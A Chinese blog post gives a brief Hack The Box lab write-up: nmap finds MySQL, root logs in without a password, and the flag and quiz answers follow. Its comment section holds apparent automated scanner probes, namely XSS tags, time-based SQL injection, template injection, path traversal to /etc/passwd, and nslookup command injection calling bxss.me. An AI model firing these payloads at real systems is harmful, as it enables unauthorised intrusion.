首页 Hack The Box

很久没更新了,我今天又来水文章了,虽然没人看hh

1.每次都给个ip就只能nmap起手了

请输入图片描述

2.只开放了3306 端口,话不多说先爆弱口令

请输入图片描述

3.没爆破出来,emm 试一下直接连接

请输入图片描述

4.直接冲 flag 到手

请输入图片描述

5.问题及答案

1.What does the acronym SQL stand for?
-> Structured Query Language
2.During our scan, which port running mysql do we find?
-> 3306
3.What community-developed MySQL version is the target running?
-> MariaDB
4.What switch do we need to use in order to specify a login username for the MySQL service?
-> -u
5.Which username allows us to log into MariaDB without providing a password?
-> root
6.What symbol can we use to specify within the query that we want to display eveything inside a table?
-> *
7.What symbol can we use to specify within the query that we want to display eveything inside a table?
-> ;
Hack The Box
版权属于:classic0796
作品采用 知识共享署名-非商业性使用-相同方式共享 4.0 国际许可协议 进行许可
文章评论
    dfb__${98991*97996}__::.x 访客ChromeWindows
    2022-08-30 9:33   回复

    1

    dfb[[${98991*97996}]]xca 访客ChromeWindows
    2022-08-30 9:33   回复

    1

    dfb{{98991*97996}}xca 访客ChromeWindows
    2022-08-30 9:33   回复

    1

    19706637 访客ChromeWindows
    2022-08-30 9:33   回复

    1

    1 访客ChromeWindows
    2022-08-30 8:44   回复

    1

    1 访客ChromeWindows
    2022-08-30 8:43   回复

    1

    1 访客ChromeWindows
    2022-08-30 8:43   回复

    1

    1 访客ChromeWindows
    2022-08-30 8:43   回复

    1

    1 访客ChromeWindows
    2022-08-30 8:43   回复

    1

    19028895 访客ChromeWindows
    2022-08-30 8:40   回复

    1

    19247856 访客ChromeWindows
    2022-08-30 8:28   回复

    1

    19121445 访客ChromeWindows
    2022-08-30 8:28   回复

    1

    19004081 访客ChromeWindows
    2022-08-30 8:28   回复

    1

    dfb__${98991*97996}__::.x 访客ChromeWindows
    2022-08-30 8:21   回复

    1

    1 访客ChromeWindows
    2022-08-30 8:21   回复

    1

    1 访客ChromeWindows
    2022-08-30 8:21   回复

    1

    bfg5135%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl5135 访客ChromeWindows
    2022-08-30 8:21   回复

    1

    19089476 访客ChromeWindows
    2022-08-30 8:20   回复

    1

    1 访客ChromeWindows
    2022-08-30 0:50   回复

    1

      bfgx6808%C0%BEz1%C0%BCz2a%90bcxhjl6808 访客ChromeWindows
      2022-08-30 9:33   回复

      1

      bfg6787%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl6787 访客ChromeWindows
      2022-08-30 9:33   回复

      1

      19252494 访客ChromeWindows
      2022-08-30 9:33   回复

      1

      1 访客ChromeWindows
      2022-08-30 9:28   回复

      1Xexxf
      <ScRiPt >lMah(9971)</ScRiPt>

      1 访客ChromeWindows
      2022-08-30 9:28   回复

      1 访客ChromeWindows
      2022-08-30 9:28   回复

      1 访客ChromeWindows
      2022-08-30 9:28   回复

      1u003CScRiPtlMah(9786)u003C/sCripTu003E

      1 访客ChromeWindows
      2022-08-30 9:28   回复

      1

      1 访客ChromeWindows
      2022-08-30 9:27   回复

      1<body onload=lMah(9945)>

      1 访客ChromeWindows
      2022-08-30 9:27   回复

      1

      1 访客ChromeWindows
      2022-08-30 9:27   回复

      1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%6C%4D%61%68%28%39%31%32%35%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

      1 访客ChromeWindows
      2022-08-30 9:27   回复

      1<WZTOF3>MUYJV[!+!]</WZTOF3>

      1 访客ChromeWindows
      2022-08-30 9:27   回复

      1<ScRiPt >lMah(9534)</ScRiPt>

      1 访客ChromeWindows
      2022-08-30 9:27   回复

      1

      1 访客ChromeWindows
      2022-08-30 9:26   回复

      <th:t="${dfb}#foreach

      19041473 访客ChromeWindows
      2022-08-30 9:26   回复

      1

      1 访客ChromeWindows
      2022-08-30 9:26   回复

      1

      1 访客ChromeWindows
      2022-08-30 9:26   回复

      bfgx7973%C0%BEz1%C0%BCz2a%90bcxhjl7973

      1 访客ChromeWindows
      2022-08-30 9:26   回复

      bfg6162%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl6162

      1 访客ChromeWindows
      2022-08-30 9:26   回复

      19926191

      1 访客ChromeWindows
      2022-08-30 9:25   回复

      '"()&%<zzz><ScRiPt >lMah(9838)</ScRiPt>

      1 访客ChromeWindows
      2022-08-30 9:25   回复

      1'"()&%<zzz><ScRiPt >lMah(9169)</ScRiPt>

      1 访客ChromeWindows
      2022-08-30 8:46   回复

      6L1iS6gB' OR 536=(SELECT 536 FROM PG_SLEEP(15))--

      1 访客ChromeWindows
      2022-08-30 8:46   回复

      -1)) OR 462=(SELECT 462 FROM PG_SLEEP(15))--

      1 访客ChromeWindows
      2022-08-30 8:46   回复

      -5 OR 92=(SELECT 92 FROM PG_SLEEP(15))--

      1 访客ChromeWindows
      2022-08-30 8:46   回复

      -1); waitfor delay '0:0:15' --

      1 访客ChromeWindows
      2022-08-30 8:46   回复

      -1 OR 2+412-412-1=0+0+0+1 --

      1 访客ChromeWindows
      2022-08-30 8:46   回复

      1

      1 访客ChromeWindows
      2022-08-30 8:45   回复

      1

      1 访客ChromeWindows
      2022-08-30 8:45   回复

      1

      1 访客ChromeWindows
      2022-08-30 8:45   回复

      1

      1 访客ChromeWindows
      2022-08-30 8:45   回复

      1

      1 访客ChromeWindows
      2022-08-30 8:45   回复

      1

      -1' OR 2+552-552-1=0+0+0+1 or 'ntuphjOv'=' 访客ChromeWindows
      2022-08-30 8:44   回复

      1

      1 访客ChromeWindows
      2022-08-30 8:44   回复

      19545491

      1 访客ChromeWindows
      2022-08-30 8:44   回复

      '"()&%<zzz><ScRiPt >8l6E(9540)</ScRiPt>

      1 访客ChromeWindows
      2022-08-30 8:44   回复

      ";print(md5(31337));$a="

      /xfs.bxss.me 访客ChromeWindows
      2022-08-30 8:44   回复

      1

      1 访客ChromeWindows
      2022-08-30 8:44   回复

      '.gethostbyname(lc('hitei'.'uflpafuba9414.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(104).chr(79).chr(118).chr(85).'

      1 访客ChromeWindows
      2022-08-30 8:43   回复

      1

      1 访客ChromeWindows
      2022-08-30 8:43   回复

      1

      1 访客ChromeWindows
      2022-08-30 8:43   回复

      1Bq9RLSFHVO

      1BL3Zp6q3VO 访客ChromeWindows
      2022-08-30 8:43   回复

      1

      1 访客ChromeWindows
      2022-08-30 8:29   回复

      1

    1 访客ChromeWindows
    2022-08-29 18:36   回复

    -1' OR 2+852-852-1=0+0+0+1 --

      1 访客ChromeWindows
      2022-08-30 8:42   回复

      1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

      1 访客ChromeWindows
      2022-08-30 8:42   回复

      YxQzMWc3')) OR 705=(SELECT 705 FROM PG_SLEEP(15))--

      1 访客ChromeWindows
      2022-08-30 8:42   回复

      pR9Cd2ry' OR 230=(SELECT 230 FROM PG_SLEEP(15))--

      1 访客ChromeWindows
      2022-08-30 8:41   回复

      -1)) OR 365=(SELECT 365 FROM PG_SLEEP(15))--

      1 访客ChromeWindows
      2022-08-30 8:41   回复

      1 waitfor delay '0:0:15' --

      1 访客ChromeWindows
      2022-08-30 8:41   回复

      -1); waitfor delay '0:0:15' --

      1 访客ChromeWindows
      2022-08-30 8:40   回复

      0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

      1 访客ChromeWindows
      2022-08-30 8:40   回复

      -1' OR 2+857-857-1=0+0+0+1 --

      1 访客ChromeWindows
      2022-08-30 8:40   回复

      -1 OR 2+756-756-1=0+0+0+1 --

      1 访客ChromeWindows
      2022-08-30 8:40   回复

      1

      1 访客ChromeWindows
      2022-08-30 8:39   回复

      1

      1 访客ChromeWindows
      2022-08-30 8:39   回复

      1

      1 访客ChromeWindows
      2022-08-30 8:38   回复

      ${@print(md5(31337))}

      1 访客ChromeWindows
      2022-08-30 8:38   回复

      1

      /xfs.bxss.me 访客ChromeWindows
      2022-08-30 8:38   回复

      1

      1 访客ChromeWindows
      2022-08-30 8:38   回复

      c:/windows/win.ini

      @@mlVfQ 访客ChromeWindows
      2022-08-30 8:37   回复

      1

      1 访客ChromeWindows
      2022-08-30 8:37   回复

      bxss.me/t/xss.html?%00

      1 访客ChromeWindows
      2022-08-30 8:37   回复

      1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg

      1 访客ChromeWindows
      2022-08-30 8:37   回复

      ../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

      1 访客ChromeWindows
      2022-08-30 8:37   回复

      ................windowswin.ini

      1 访客ChromeWindows
      2022-08-30 8:37   回复

      1

      1 访客ChromeWindows
      2022-08-30 8:37   回复

      (nslookup hitaeoeewwjsk3624d.bxss.me||perl -e "gethostbyname('hitaeoeewwjsk3624d.bxss.me')")

      1 访客ChromeWindows
      2022-08-30 8:37   回复

      |(nslookup hitfgfbasbxsrc7330.bxss.me||perl -e "gethostbyname('hitfgfbasbxsrc7330.bxss.me')")

      1 访客ChromeWindows
      2022-08-30 8:36   回复

      ../../../../../../../../../../etc/passwd%00.jpg

      1 访客ChromeWindows
      2022-08-30 8:36   回复

      ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

      1 访客ChromeWindows
      2022-08-30 8:36   回复

      ../1

      a52IDmQB 访客ChromeWindows
      2022-08-30 8:36   回复

      1

      1 访客ChromeWindows
      2022-08-30 8:36   回复

      "+response.write(9541828*9311247)+"

      1 访客ChromeWindows
      2022-08-30 8:36   回复

      '+response.write(9541828*9311247)+'

      -1' OR 2+356-356-1=0+0+0+1 or 'GJ894LCS'=' 访客ChromeWindows
      2022-08-30 8:36   回复

      1

      -1 OR 2+374-374-1=0+0+0+1 访客ChromeWindows
      2022-08-30 8:35   回复

      1

      -1 OR 2+365-365-1=0+0+0+1 -- 访客ChromeWindows
      2022-08-30 8:35   回复

      1

      1 访客ChromeWindows
      2022-08-30 8:35   回复

      1

      1 访客ChromeWindows
      2022-08-30 8:35   回复

      1

      1 访客ChromeWindows
      2022-08-30 8:31   回复

      1

    1 访客ChromeWindows
    2022-08-29 18:36   回复

    -1 OR 2+975-975-1=0+0+0+1 --

      1 访客ChromeWindows
      2022-08-30 8:44   回复

      1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

      1 访客ChromeWindows
      2022-08-30 8:44   回复

      Un96tMoe' OR 364=(SELECT 364 FROM PG_SLEEP(15))--

      1 访客ChromeWindows
      2022-08-30 8:42   回复

      1

      1 访客ChromeWindows
      2022-08-30 8:42   回复

      1

      1 访客ChromeWindows
      2022-08-30 8:40   回复

      '"()&%<zzz><ScRiPt >NftV(9795)</ScRiPt>

      1 访客ChromeWindows
      2022-08-30 8:40   回复

      1

      1 访客ChromeWindows
      2022-08-30 8:39   回复

      zBxaR942

      1 访客ChromeWindows
      2022-08-30 8:39   回复

      1

      -1' OR 2+283-283-1=0+0+0+1 -- 访客ChromeWindows
      2022-08-30 8:39   回复

      1

      SomeCustomInjectedHeader: injected_by_wvs 访客ChromeWindows
      2022-08-30 8:39   回复

      1

      gko80OBo 访客ChromeWindows
      2022-08-30 8:39   回复

      1

      -1 OR 2+479-479-1=0+0+0+1 -- 访客ChromeWindows
      2022-08-30 8:39   回复

      1

      1 访客ChromeWindows
      2022-08-30 8:39   回复

      1

      1 访客ChromeWindows
      2022-08-30 8:33   回复

      1

    1 访客ChromeWindows
    2022-08-29 18:36   回复

    1

    1 访客ChromeWindows
    2022-08-29 18:36   回复

    1

    1 访客ChromeWindows
    2022-08-29 18:36   回复

    1

    1 访客ChromeWindows
    2022-08-29 18:36   回复

    1

    1 访客ChromeWindows
    2022-08-29 18:36   回复

    1

    1 访客ChromeWindows
    2022-08-29 18:35   回复

    1

    ../../../../../../../../../../../../../../etc/passwd 访客ChromeWindows
    2022-08-29 18:35   回复

    1

    1 访客ChromeWindows
    2022-08-29 18:35   回复

    1

    -1' OR 3+474-474-1=0+0+0+1 or 'R0kYlFB2'=' 访客ChromeWindows
    2022-08-29 18:35   回复

    1

    -1' OR 2+809-809-1=0+0+0+1 -- 访客ChromeWindows
    2022-08-29 18:35   回复

    1

    -1 OR 2+225-225-1=0+0+0+1 访客ChromeWindows
    2022-08-29 18:34   回复

    1

    -1 OR 2+282-282-1=0+0+0+1 -- 访客ChromeWindows
    2022-08-29 18:34   回复

    1

    1 访客ChromeWindows
    2022-08-29 18:34   回复

    1

    1ddBRLgcO 访客ChromeWindows
    2022-08-29 18:34   回复

    1

    1 访客ChromeWindows
    2022-08-29 18:34   回复

    1

    1 访客ChromeWindows
    2022-08-29 18:33   回复

    1

    1 访客ChromeWindows
    2022-08-29 18:27   回复

    1

目录